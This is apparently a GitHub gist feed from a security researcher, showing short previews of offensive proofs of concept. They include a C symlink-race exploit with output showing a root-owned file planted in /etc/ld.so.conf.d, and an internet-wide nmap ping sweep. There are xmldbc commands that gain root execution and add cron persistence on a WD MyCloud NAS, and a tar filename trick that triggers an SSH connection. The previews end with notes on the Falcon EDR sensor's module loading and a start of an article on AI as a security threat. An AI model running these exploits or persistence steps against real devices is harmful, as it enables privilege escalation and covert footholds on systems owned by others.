Tim Brown timb-machine
timb-machine
/ Log efficacy scoring system
Created
November 25, 2025 03:43
Log efficacy scoring system
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Efficacy = (Value - Cost) * Practicality | |
| Value = (IF(Efficacy of Ingestion="High", 25, IF(Efficacy of Ingestion="Low", 0.1, 12.5))+IF(Value of Domain="High", 25, IF(Value of Domain="Low", 0.1, 12.5)))*((LEN(Tactics Covered)-LEN(SUBSTITUTE(Tactics Covered,",",""))+1)/5) | |
| Cost = IF(Cost of Deployment (Changed Required)="High", 0.1, IF(Cost of Deployment (Changed Required)="Low", 25, 12.5))+IF(Cost of Operation (Expected Throughput)="High", 0.1, IF(Cost of Operation (Expected Throughput)="Low", 100, 50)) | |
| Practicality = IF(Existing Capability="Yes", 1, IF(Existing Capability="No", 0.1, 0.5))+IF(Naturally Occurring="Yes", 1, IF(Naturally Occurring="No", 0.1, 0.5)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Prompt 1: "adopt the persona of a technical marketing editor and write me a marketing article about using AI for security. structure it to look like a breach report but ensure that you don't make up an IOCs or other forensic artefacts. i mean it, no hallucination of IOCs." | |
| Prompt 2: "rewrite it to consider ai a threat" | |
| --- | |
| # **When the Defender Becomes the Adversary: Understanding AI as a New Security Threat** | |
| ## Executive Summary | |
| AI is transforming the cybersecurity landscape—but not always in the ways we expect. While organizations increasingly rely on AI for detection, correlation, and response, adversaries are quickly weaponizing AI to accelerate their own operations. Even more critically, AI systems inside the enterprise can become attack surfaces themselves: manipulable, misaligned, or leveraged to amplify existing threats. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo nmap -sn 0.0.0.0/0 | |
| $ wireshark -f "icmp and dst host <my IP>" | |
| ... | |
| Wireshark filter: "data.data and (!(data.data == 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00) and !(data.data == 10:11:12:13:14:15:16:17:18:19:1a:1b:1c:1d:1e:1f:20:21:22:23:24:25:26:27:28:29:2a:2b:2c:2d:2e:2f:30:31:32:33:34:35:36:37))" | |
| Example: https://www.shodan.io/host/1.10.240.50 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <unistd.h> | |
| #include <stdio.h> | |
| int main(int argc, char **argv) { | |
| while (symlink(argv[2], argv[1])) { | |
| } | |
| printf("w00t!\n"); | |
| } |
timb-machine
/ Racey, racey, catch the backups
Created
October 19, 2025 14:34
Racey, racey, catch the backups
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ./sploit /var/opt/XXXXNN-XXX/XXXX/XXX/XNN.XXXXX /etc/ld.so.conf.d/pwnies.conf | |
| w00p! | |
| $ ls -la /etc/ld.so.conf.d/pwnies.conf | |
| -rw-r--r-- 1 root root 101 Oct 19 15:32 /etc/ld.so.conf.d/pwnies.conf |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ tar --version | |
| tar (GNU tar) 1.34 | |
| Copyright © 2021 Free Software Foundation, Inc. | |
| Licence GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. | |
| This is free software: you are free to change and redistribute it. | |
| There is NO WARRANTY, to the extent permitted by law. | |
| Written by John Gilmore and Jay Fenlason. | |
| $ tar ztvf file\:M.m.p.tar.gz | |
| The authenticity of host 'file (192.168.67.59)' can't be established. |
timb-machine
/ Early implementation of Place in Kill Chain
Created
June 26, 2025 20:17
Early implementation of Place in Kill Chain
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python3 PiKC.py | |
| === System Parameters Summary === | |
| System Role: web server | |
| Open Ports: [80, 443, 8080] | |
| IP Addresses: ['203.0.113.50'] | |
| Software: Apache httpd 2.4.54 | |
| Interactive User: False | |
| Critical Asset: False | |
| Virtualized: False |
timb-machine
/ So you just want code execution on your NAS?
Created
June 5, 2025 21:15
So you just want code execution on your NAS?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If you don't need persistence, why work so hard? | |
| $ rm /foo; xmldbc -t "test:10:touch /foo"; ls -la /foo; xmldbc -D /tmp/config.xml; sleep 20; ls -la /foo | |
| ls: /foo: No such file or directory | |
| -rw-r--r-- 1 root root 0 Jun 5 22:11 /foo |
timb-machine
/ Adding persistence to WD MyCloud NAS device cron...
Last active
August 30, 2025 16:36
Adding persistence to WD MyCloud NAS device cron...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Say for exmaple, you wanted a cron entry that would run persist.sh every 5 minutes... | |
| $ xmldbc -s /system_mgr/crond/list/count "9" | |
| $ xmldbc -s /system_mgr/crond/list/name:9 "persist" | |
| $ xmldbc -s /system_mgr/crond/persist/count "1" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/method "3" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/1 "*/5" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/2 "*" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/3 "*" | |
| $ xmldbc -s /system_mgr/crond/persist/item:1/4 "*" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Falcon-sensor strace: | |
| 1185 init_module(0x556ce33f8b00, 204357, "") = 0 | |
| 1185 init_module(0x556ce3430940, 122757, "") = 0 | |
| 1185 init_module(0x556ce342a950, 24541, "") = 0 | |
| 1185 init_module(0x7f33243be010, 1718317, "configbuild=1007.8.0012905.1") = 0 | |
| (gdb) catch syscall init_module | |
| (gdb) run | |
| … |
NewerOlder